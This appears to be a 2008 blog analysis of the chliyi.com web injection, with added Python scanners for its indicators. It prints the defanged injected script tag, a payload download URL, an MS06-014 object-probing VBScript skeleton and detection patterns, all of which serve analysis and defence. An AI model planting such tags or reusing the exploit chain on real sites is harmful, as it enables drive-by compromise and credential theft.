Malicious Site Analysis for chliyi.com injection
Posted by jeremy on 29th May 2008
According to my Google searching, chliyi.com has successfully been injected into about 12,000 sites. This malicious domain is using the well-publicized Adobe Flash vulnerability along with a few others. The good news is that Symantec Threatcon has retracted its declaration that this is a 0-day exploit and has since clarified, with Adobe's help, that the exploit does not work on the newest version of the Flash Player, version 9.0.124.0. This site is not very complex in structure, as the following site map demonstrates:
As you can see, the entry page for this injection is chliyi.com/reg.js, loaded with the following code:
<script src=hxxp://www.chliyi.com/reg.js>
hxxp://www.chliyi.com/reg.js
This file contains no obfuscation, but it does contain some interesting logic, as you can see.
Obviously, if you are using the Chinese language pack you won't receive any of the malicious code, so I would assume the authors want to avoid exploiting Chinese clients. With that, I also believe that this round of injections was most likely performed by a Chinese organization.
hxxp://www.chliyi.com/img/info.htm
This page is where the obfuscation starts. It also starts the decision tree for choosing which exploits to serve to a user directed to this malicious domain. The first layer of obfuscation is done with VBScript and looks like this:
My first deobfuscation pass revealed even more VBScript obfuscation, which can be seen here:
After the second deobfuscation we see the first branch of the decision tree for choosing which exploits to send to the user's computer. The first test tries to create an Adodb.Stream object with the clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 classid, which would identify a browser that is possibly susceptible to the MS06-014 vulnerability. If the creation is successful, the user is directed to the help.htm page; if it fails, the user is sent on to a series of exploits, including the highly publicized Flash Player exploit.
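For webmasters checking whether their own pages carry this injection, and for analysts triaging landing pages, a static scan for the markers described above is a quick first pass: the injected script tag pointing at chliyi.com (or the payload host jj120.net) and the RDS.DataSpace classid probed by the MS06-014 decision tree. The following Python scanner is an added example, not code from the original post; the HTML samples it scans are constructed for illustration, and the Microsoft.XMLHTTP object name is an assumption based on how the MS06-014 chain is commonly written rather than something shown on this page.

```python
"""Static scanner for the chliyi.com injection and MS06-014 exploit markers.

Added example, not code from the original analysis. The sample HTML below is
constructed; the indicators come from the analysis itself.
"""
import re

# Hosts named in the analysis: the exploit landing site and the payload host.
INJECTED_HOSTS = ("chliyi.com", "jj120.net")
# Classid probed by info.htm to detect a browser vulnerable to MS06-014.
MS06_014_CLSID = "BD96C556-65A3-11D0-983A-00C04FC29E36"

# The injected tag is unquoted, so accept quoted and unquoted src values and any
# protocol prefix, including the defanged "hxxp" form used in write-ups.
SCRIPT_SRC_RE = re.compile(
    r"<script[^>]*\bsrc\s*=\s*['\"]?\s*(?:h[tx]{2}ps?:)?//([^/'\"\s>]+)",
    re.IGNORECASE,
)
CLSID_RE = re.compile(r"clsid:\s*\{?" + MS06_014_CLSID + r"\}?", re.IGNORECASE)
# Objects typically instantiated through the RDS.DataSpace control in the
# MS06-014 chain (Microsoft.XMLHTTP is an assumption; Adodb.Stream is on the page).
OBJECT_RE = re.compile(r"(Adodb\.Stream|Microsoft\.XMLHTTP)", re.IGNORECASE)


def host_matches(host, bad_hosts):
    """True if host equals a listed domain or is a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == h or host.endswith("." + h) for h in bad_hosts)


def scan_html(text):
    """Return a list of string findings for one HTML/script document."""
    findings = []
    for m in SCRIPT_SRC_RE.finditer(text):
        if host_matches(m.group(1), INJECTED_HOSTS):
            findings.append("injected-script:" + m.group(1).lower())
    if CLSID_RE.search(text):
        findings.append("ms06-014-clsid")
    for name in sorted({m.group(1).lower() for m in OBJECT_RE.finditer(text)}):
        findings.append("suspicious-object:" + name)
    return findings


# Constructed sample: a site page carrying the injected loader tag.
SAMPLE_INJECTED_PAGE = """<html><body>
<h1>Welcome</h1>
<script src=hxxp://www.chliyi.com/reg.js></script>
</body></html>"""

# Constructed sample: the object-probing skeleton of an MS06-014 stage
# (deobfuscated form; no download or execution logic included).
SAMPLE_EXPLOIT_STAGE = """<script language="VBScript">
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set x = df.CreateObject("Microsoft.XMLHTTP", "")
Set S = df.CreateObject("Adodb.Stream", "")
</script>"""

if __name__ == "__main__":
    for label, doc in (("site page", SAMPLE_INJECTED_PAGE),
                       ("exploit stage", SAMPLE_EXPLOIT_STAGE)):
        print(label, "->", scan_html(doc) or "clean")
```

A hit on the injected-script check alone is enough to pull the page and start cleaning; the classid and object findings are what you expect on the attacker's own stages, so seeing them on a site you own means more than the loader tag was planted.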
hxxp://www.chliyi.com/img/help.htm
The help.htm file is obfuscated with VBScript as well, but definitely not as heavily. The obfuscated page looked like this:
Deobfuscated, it is very clear which vulnerability the authors are targeting. MS06-014 is an older vulnerability, but it must still have a very good success rate, as lots of malicious code still targets it. It was only last month that the famous MPack toolkit stopped including it, so, as everyone has said before me, keep your systems patched to avoid old vulnerabilities like this one being exploited on your systems.
If the exploit is successful, the user will download the hxxp://www.jj120.net/inc/fuckjp.exe binary. VirusTotal results for this are fair at 22/32 (68.75%) and can be seen here: VirusTotal Results. Running this Trojan in my lab, it grabbed two more files, FLoader.exe and WLoader.exe, which from my analysis are World of Warcraft account credential stealers. Their respective VirusTotal results can be found here: FLoader Results and WLoader.exe Results. Obviously the gaming industry offers something valuable to the site authors. Lately I have started to see a lot more of these types of Trojans, where account information for specific gaming sites is stolen instead of the usual email and bank credentials.
hxxp://www.chliyi.com/img/flash.swf
This is obviously the Flash Player exploit that has been getting so much attention in the last few days. Most of the other sites using this exploit embed ActionScript that directs you to load different Flash files, choosing the exploit based on your browser. For example, most sites separate the Firefox file from the IE file, but this one is not as sophisticated and serves only one Flash file. The Flash decompilation with swfdump looks like this:
A code extraction attempt using flare showed this:
I am fairly new at deobfuscating Flash files, but what I did notice is that there is no ActionScript associated with the exploit. You can read the security bulletin posted by Adobe for more information, and if you happen to run across the toolkit or actual exploit documentation, feel free to send it my way.
Also, here are the VirusTotal results for flash.swf.
hxxp://www.chliyi.com/img/real.htm
This is another VBScript-obfuscated page, but this time it targets the RealPlayer vulnerability CVE-2007-5601. This is just another example of why system administrators need to pay attention to software updates beyond the Microsoft Windows and Microsoft Office updates published once a month. The deobfuscation process took two VBScript deobfuscation passes to reveal the actual JavaScript exploit, seen here:
I didn't include the obfuscated code snapshots, as they were very large files with too many lines to take screenshots that would display properly in this post. If you need them I can send them your way or post them for download; just ask.
hxxp://www.chliyi.com/img/new.htm
The new.htm file is another attempt at exploiting a known vulnerability in RealPlayer (CVE-2008-1309). This deobfuscation took two VBScript decodes to render the following code:
Obviously none of the exploits being served up by this malicious domain are 0-days, so if you keep your systems up to date and exercise a little caution when surfing the internet you should be OK. One plugin I would highly recommend is NoScript for Firefox, as it will definitely help stop these scripts from executing without your permission. I would also suggest filtering the domain names seen in this analysis, chliyi.com and jj120.net, at the very minimum if you have that capability. Another option would be to block the IPs associated with these domains, chliyi.com (218.30.96.87) and jj120.net (61.142.250.221), though this sometimes leads to legitimate sites being blocked, as they could be on a shared host. I checked all the A and CNAME records associated with those IPs and didn't see anything that looked legitimate or popular. I would rather block now and apologize later, but this is definitely not the corporate standard.
I also wasn't surprised at all to see who the registrars for these two hostile domains were, as they seem to be very popular with the malware-writing community lately.
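Before blocking, it is worth knowing which clients already reached these hosts, and a domain match is a stronger signal than an IP match because of the shared-hosting caveat above. The script below is an added example, not part of the original post: it checks proxy log lines against the two domains and two IPs from this analysis and reports the two kinds of match separately. The log lines are constructed in the Squid native access.log layout and are not real traffic; the client addresses and timestamps are invented.

```python
"""Match the network indicators from the chliyi.com analysis against proxy logs.

Added example, not code from the original post. Sample log lines are
constructed in Squid native access.log format; nothing here is real traffic.
"""
import re

# Indicators stated in the analysis.
IOC_DOMAINS = {"chliyi.com": "exploit landing", "jj120.net": "payload host"}
IOC_IPS = {"218.30.96.87": "chliyi.com", "61.142.250.221": "jj120.net"}

# Squid native format:
# time elapsed client action/code size method URL ident hierarchy/peer type
SQUID_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+(?P<method>\S+)\s+"
    r"(?P<url>\S+)\s+\S+\s+\S+/(?P<server>\S+)\s+\S*$"
)
HOST_RE = re.compile(r"^[a-z][a-z0-9+.-]*://([^/:?#]+)", re.IGNORECASE)


def url_host(url):
    """Extract the hostname from a URL, or from a CONNECT-style host:port."""
    m = HOST_RE.match(url)
    return m.group(1).lower() if m else url.split(":")[0].lower()


def domain_hit(host):
    """Return the matching IOC domain (exact or subdomain), or None."""
    for dom in IOC_DOMAINS:
        if host == dom or host.endswith("." + dom):
            return dom
    return None


def match_iocs(lines):
    """Return one record per log line that touches an IOC domain or IP.

    Domain and IP matches are reported as separate reasons: an IP-only hit
    may be another site on the same shared host, as the analysis cautions.
    """
    hits = []
    for line in lines:
        m = SQUID_RE.match(line.strip())
        if not m:
            continue
        host = url_host(m.group("url"))
        server = m.group("server")
        reasons = []
        dom = domain_hit(host)
        if dom:
            reasons.append("domain:" + dom)
        if server in IOC_IPS:
            reasons.append("ip:" + server)
        if reasons:
            hits.append({"ts": m.group("ts"), "client": m.group("client"),
                         "host": host, "reasons": reasons})
    return hits


# Constructed sample log: one clean request, the loader fetch, the payload
# download, and an unrelated host resolving to the shared chliyi.com address.
SAMPLE_LOG = """\
1212000001.123    245 10.0.0.12 TCP_MISS/200 1834 GET http://www.example.org/index.html - DIRECT/93.184.216.34 text/html
1212000002.456     98 10.0.0.12 TCP_MISS/200 612 GET http://www.chliyi.com/reg.js - DIRECT/218.30.96.87 application/x-javascript
1212000003.789    130 10.0.0.12 TCP_MISS/200 40960 GET http://www.jj120.net/inc/fuckjp.exe - DIRECT/61.142.250.221 application/octet-stream
1212000004.012     60 10.0.0.40 TCP_MISS/200 2048 GET http://other.example/page.html - DIRECT/218.30.96.87 text/html
"""

if __name__ == "__main__":
    for hit in match_iocs(SAMPLE_LOG.splitlines()):
        print(hit["ts"], hit["client"], hit["host"], ",".join(hit["reasons"]))
```

A client with both the reg.js fetch and a jj120.net download in the same minute went through the whole chain and should be treated as compromised; a client with only an IP-based hit on an unrelated hostname is the shared-host case and needs a look at the hostname before anyone is paged.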
Domain Name: CHLIYI.COM
Registrar: BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN
Whois Server: whois.dns.com.cn
Referral URL: http://www.dns.com.cn
Name Server: DNS21.HICHINA.COM
Name Server: DNS22.HICHINA.COM
Status: ok
Updated Date: 24-jan-2008
Creation Date: 12-jun-2003
Expiration Date: 12-jun-2008
Domain Name: JJ120.NET
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.72DNS.COM
Name Server: NS2.72DNS.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 09-mar-2008
Creation Date: 07-mar-2006
Expiration Date: 07-mar-2009
As always if you have any questions or comments feel free to contact me or leave them here.